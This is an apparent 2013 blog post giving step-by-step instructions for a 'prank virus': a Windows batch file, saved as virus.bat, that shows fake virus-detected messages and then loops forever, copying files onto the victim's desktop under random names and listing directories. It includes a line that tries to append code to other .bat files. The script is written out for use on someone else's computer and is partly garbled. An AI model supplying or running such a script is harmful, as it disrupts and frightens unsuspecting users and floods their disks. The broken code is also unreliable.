Powered By Blogger

Friday, 10 May 2013

MAKE A FUNNY FRANK VIRUS WITH UR NOTEPAD

  1. Open notepad

  2. 2
    Type the following code in:

@echo off
echo checking system:
echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
Pause
echo DELETING VIRUS
pause
:1
dir /s
copy c:\tmp.bat
c:\docum~1\%username%\desktop\greatgame_%random%.bat

goto 1

  1. 1
    This will create a never ending stream of mindless code. This cannot be stopped easily.

  2. 2
    Save the file as "virus.bat"

  3. 3
    Have fun

No comments:

Post a Comment